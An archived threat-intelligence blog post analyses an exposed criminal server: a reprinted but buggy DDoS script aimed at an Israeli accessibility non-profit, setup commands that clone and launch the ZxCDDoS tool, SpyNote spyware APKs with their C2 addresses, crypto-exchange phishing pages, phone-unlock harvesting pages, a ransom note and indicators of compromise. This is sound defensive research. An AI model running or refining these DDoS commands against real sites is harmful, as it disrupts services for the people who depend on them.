{
	"id": "1614d6da-a9fb-4a59-a5f1-ed007548a635",
	"created_at": "2026-04-06T00:09:34.205779Z",
	"updated_at": "2026-04-10T13:11:30.828179Z",
	"deleted_at": null,
	"sha1_hash": "ea4dd158480097d5209aa1a5c71de341111cf34d",
	"title": "Inside a Cybercriminal’s Server: DDoS Tools, Spyware APKs, and Phishing Templates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7121371,
	"plain_text": "Inside a Cybercriminal’s Server: DDoS Tools, Spyware APKs, and\r\nPhishing Templates\r\nPublished: 2024-10-08 · Archived: 2026-04-05 19:03:46 UTC\r\nTABLE OF CONTENTS\r\nIntroductionDDoS Tools OverviewSpyNote APKsPhishing PagesRansomeware?Final ThoughtsNetwork\r\nObservablesHost Observables *Executable \u0026 ransomware-related files only.\r\nIntroduction\r\nDuring a recent investigation, we uncovered a cybercriminal's exposed server containing DDoS scripts, SpyNote\r\nspyware disguised as popular apps, phishing pages targeting digital currency companies and messaging platforms,\r\nand ransom notes hinting at ransomware delivery. This find gave us a unique opportunity to examine the tools\r\nthese criminals rely on and the types of victims they choose.\r\nIn today's post, we'll discuss the discovered files and illuminate the tactics and strategies used to target\r\nunsuspecting networks.\r\nWe'll start our investigation of the server with the DDoS tools ddos.py and ddos.txt. The Python script is\r\ndesigned (albeit not very good) to launch a denial-of-service attack against the website aisrael[.]org.\r\nThe target website is a non-profit organization established in 1999 to promote accessibility and inclusion for\r\npeople with disabilities and the elderly in Israel.\r\nddos.py attempts to overwhelm the server by sending a large number of HTTP requests using the requests library\r\nin rapid succession. While the code itself is rudimentary and contains errors, the intent is clear: to disrupt access to\r\nthe targeted site by exhausting its resources. The program opens with a simplistic ASCII banner displaying \"DDoS\r\nAttack.\"\r\nThe code for ddos.py is below:\r\nimport threading\r\nimport requests\r\nimport pyfiglet\r\nimport time\r\nZ = '\\033[1;31m' # أحمر\r\nB = '\\033[1;34m' # أزرق\r\nL = '\\033[1;33m' # أصفر\r\nX = '\\033[0m'\r\nlogo = pyfiglet.figlet_format('DDOS Attack')\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 1 of 14\n\nprint(Z + logo + Z)\r\nurl = \"\r\nhttps://aisrael.org/\r\nرابط الهدف # \"\r\nthreads = 100000000000000000000000000\r\nprint(f'{B}-----------------------')\r\ndef text(string):\r\n for char in string:\r\n print(char, end=\"\", flush=True)\r\n time.sleep(10 / 1000)\r\ndef send_request():\r\n while True:\r\n try:\r\n response = send_request.get(url)\r\n print(f\"DDOS Attack : {response.status_code}\")\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Error: {e}\")\r\nfor i in range(threads):\r\n thread = threading.Thread(target=send_request)\r\n thread.start()\r\n \r\nCopy\r\nCode content of ddos.py\r\nDespite its flaws, ddos.py reflects a straightforward approach to causing service disruption, relying on the sheer\r\nvolume of requests to impact server performance. Although not sophisticated, this tool demonstrates the\r\ncapabilities of less experienced threat actors.\r\nNotably, the script also has several comments written in Arabic, which could indicate potential attribution to an\r\nArabic-speaking actor or someone who can use Google Translate.\r\nUnlike ddos.py, ddos.txt contains a series of Bash commands designed to prepare a server environment to\r\ndownload a DDoS program from a public GitHub repository.\r\nThe repo is titled \"ZxCDDoS,\" originally uploaded by user hoaan1995 and billed as an educational tool.\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 2 of 14\n\nFigure 1: Snippet of ZxCDDoS GitHub repository README\r\nddos.txt:\r\nDebain, Ubuntu (Ubuntu 20.04 better):\r\nsudo apt-get install git -y\r\nsudo apt-get install golang -y\r\nsudo apt-get install perl -y\r\nsudo apt-get install python3 -y\r\nsudo apt-get install python2 -y\r\nsudo apt-get install python3-pip -y\r\ncurl -sL https://deb.nodesource.com/setup_16.x | sudo -E bash -;sudo apt -y install nodejs\r\nHow to use:\r\n- Recommended in shell of google, azure,...\r\n- Using vps with high speed will be stronger\r\ngit clone https://github.com/hoaan1995/ZxCDDoS/\r\ncd ZxCDDoS/\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 3 of 14\n\nnpm i requests https-proxy-agent crypto-random-string events fs net cloudscraper request hcaptcha-solver randomstring cluste\r\npip3 install -r requirements.txt\r\nwget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb\r\napt-get install ./google-chrome-stable_current_amd64.deb\r\nulimit -n 999999\r\nchmod 777 *\r\npython3 c2.py\r\n212.219.15.12\r\nhttps://www.jcie.org.uk/content/content.aspx?ID=26\r\n \r\nCopy\r\nCommands of ddos.txt\r\nddos.txt starts with instructions for installing various dependencies on Debian/Ubuntu systems, such as Git,\r\nGolang, and Python. The ZxCDDoS tool and necessary Python and Node.js libraries are downloaded upon\r\ncompletion.\r\nThese commands suggest the attacker aims to streamline the setup process, making it easy to launch an attack by\r\nproviding all the necessary components in a ready-to-use format.\r\nSpyNote APKs\r\nChrome.apk and Telegram(3) .apk exhibit typical capabilities associated with the SpyNote spyware family. Due to\r\nthis routine behavior, we won't analyze these files.\r\nWhat is worth noting are the C2s used by these malicious apps. Chrome.apk connects to an IP address\r\n(142.93.113[.]245:7771) hosted on Digital Ocean, while the fake Telegram APK communicates with the open\r\ndirectory that is the subject of this blog on the same port.\r\nThe third APK, rn.apk, disguised as an app called \"Education Hub,\" presents an interesting deviation from the\r\ntypical SpyNote malware characteristics seen in the other samples. Unlike Chrome.apk and Telegram(3).apk,\r\nrn.apk is not detected as SpyNote malware according to VirusTotal but is flagged as standard riskware instead.\r\nRiskware generally refers to software that may not be inherently malicious but poses security risks due to how it\r\ncan be exploited.\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 4 of 14\n\nFigure 2: Triage replay screenshot of rn.apk (Triage)\r\nWhile the other APKs engage in malicious activities, rn.apk operates under a different category, potentially using\r\npermissions or features that could be abused by a threat actor to access sensitive information.\r\nDespite the lack of observable C2 communication and specific SpyNote detection for rn.apk, its presence within\r\nthe threat actor's toolkit points to a more expansive strategy. The actor demonstrates a broad targeting approach by\r\ntargeting users of widely trusted applications like Chrome and Telegram and those searching for educational\r\nresources.\r\nA wide net was likely purposefully cast, increasing the likelihood of compromising diverse user groups and\r\nexpanding the overall attack surface.\r\nPhishing Pages\r\nAs mentioned in the introduction, the HTML pages on the server impersonate login interfaces for various\r\norganizations, aiming to steal credentials and sensitive information. The targets include:\r\nBinance\r\nWeChat\r\nCoinbase\r\nKraken\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 5 of 14\n\nThe HTML source code of most malicious login pages references EagleSpy, an Android RAT that allows\r\nattackers to steal login credentials, manipulate the victim's screen, and more.\r\nFigure 3: HTML source of one of the phishing pages referencing EagleSpy malware\r\nFigure 4: Screenshot of binance.html, designed for mobile devices\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 6 of 14\n\nFigure 5: kraken.html, malicious login page\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 7 of 14\n\nFigure 6: wechat.html. The message in Chinese is: \"Unauthorized detected Please verify WeChat payment\r\npassword to access the app\"\r\nTwo additional web pages mimic native mobile phone unlock screens, such as pattern and PIN entry prompts.\r\nWhen unsuspecting users enter their unlock pattern on PIN, the information is sent to an unidentified Telegram\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 8 of 14\n\naccount.\r\nStealing device credentials would allow the attacker to remotely unlock the device to access sensitive apps, data,\r\nand accounts. Additionally, this information can be used to lock the victim's device, effectively holding it hostage\r\nuntil a ransom is paid.\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 9 of 14\n\nFigure 7: Screenshot of pin.html. Targeting Russian speakers, the message can be translated to \"Enter the pin\r\ncode\"\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 10 of 14\n\nFigure 8: Screenshot of pattern.html. When the machine translated from Russian, the message reads, \"Screen\r\nUnlock Pattern\"\r\nRansomeware?\r\nWithin the \"ransomeware\" folder are two HTML files, crypto.html, and ransomware.html. The latter consists of a\r\nsplash screen with an animation that says, \"Oops! Your Phone has been hacked!\" At the bottom of the screen is a\r\n\"UNLOCK\" button that redirects users to crypto.html.\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 11 of 14\n\nFigure 8: Animated screen informing the victim their phone has been hacked\r\nLikely, crypto.html is still a work in progress, as the included QR code in the ransom note does not lead to a\r\nwebsite, and the default wallet type, \"USDT TRC20,\" contains what appears to be a wallet address of\r\n\"bc1qwqfp5hhpqjm8lq5rfp.\"\r\nHowever, the address resembles a Bech32 Bitcoin address, not a valid USDT TRC20 one.\r\nThe note demands the victim \"PAY 7K$ in BTC\" at the top of the page and then asks for $9k within two hours to\r\nprevent the stolen information from being uploaded to the Dark web.\r\nFigure 9 shows a screenshot of crypto.html.\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 12 of 14\n\nFigure 9: crypto.html ransom note displayed after clicking unlock\r\nFinal Thoughts\r\nIn this blog post, we explored the inner workings of a cybercriminal's server, uncovering malicious tools to disrupt\r\nservices and compromise mobile users. From DDoS scripts designed to overwhelm targets like aisrael.org to\r\nmobile spyware such as SpyNote and EagleSpy, the server revealed a broad scope of criminal activity.\r\nTo uncover potential cyber threats among the thousands of open directories the Hunt platform is tracking, request\r\na free demo today.\r\nNetwork Observables\r\nIP Address ASN Ports Open Domain(s) Notes\r\n137.184.53.152:443 DigitalOcean\r\n443, 5357, 7771,\r\n47001\r\nN/A\r\nOpen directory containing\r\nmalicious files.\r\n142.93.113[.]245:7771 DigitalOcean\r\n22, 135, 445,\r\n5985, 7771\r\nN/A C2 for Chrome.apk\r\nFile Name SHA-256 Hash Notes\r\ncrypto.html 7154e3d34508eb20ac372a65aca79b716398ff8be08cd53619c90f1d71e7e43c\r\nRansom\r\nnote\r\nransomware.html 979047adffa36a68f41d95e5ed28b2bf77592419636c16f3fb888f8c57555bb2\r\nChrome.apk 98d8e7539a94c278b1ba4a537953e74d03483f88ecb06f5c78038933d8e4b1d3 Spynote\r\nsample\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 13 of 14\n\nFile Name SHA-256 Hash Notes\r\nspoofing\r\nChrome\r\nbrowser.\r\nTelegram(3).apk ef5ee8cefc7f68680824fff6f8435bd857a0befca8b8dd534a23116bc5c340ed\r\nSpynote\r\nsample\r\nspoofing\r\nTelegram\r\napp.\r\nTest(12).apk e509059e222b1c30c00854d44aaf8c7450cb5a2b7c39750ff2519e759952ba2a Spynote.\r\nddos.py 6613f6fcc52a2027e822f32f73d94a32b098eaf686dc059ed79fbe35f1afd35f\r\nPython\r\nDDoS\r\nscript\r\ntargeting\r\nIsraeli\r\nwebsite.\r\nddos.txt d2047e97aa22d77f9946b60f846c8728c4fbd6a6b87013d47458f289db6a4e1f\r\nBash\r\ncommands\r\nto\r\ndownload\r\nopen-source\r\nDDoS\r\nsoftware,\r\nZxCDDoS.\r\nrn.apk ee4db5932813e8ea41779f00398bad0e98cc4536c5b88eaa3a902aac27340a18\r\nSource: https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages"
	],
	"report_names": [
		"inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages"
	],
	"threat_actors": [],
	"ts_created_at": 1775434174,
	"ts_updated_at": 1775826690,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.pdf",
		"text": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.txt",
		"img": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.jpg"
	}
}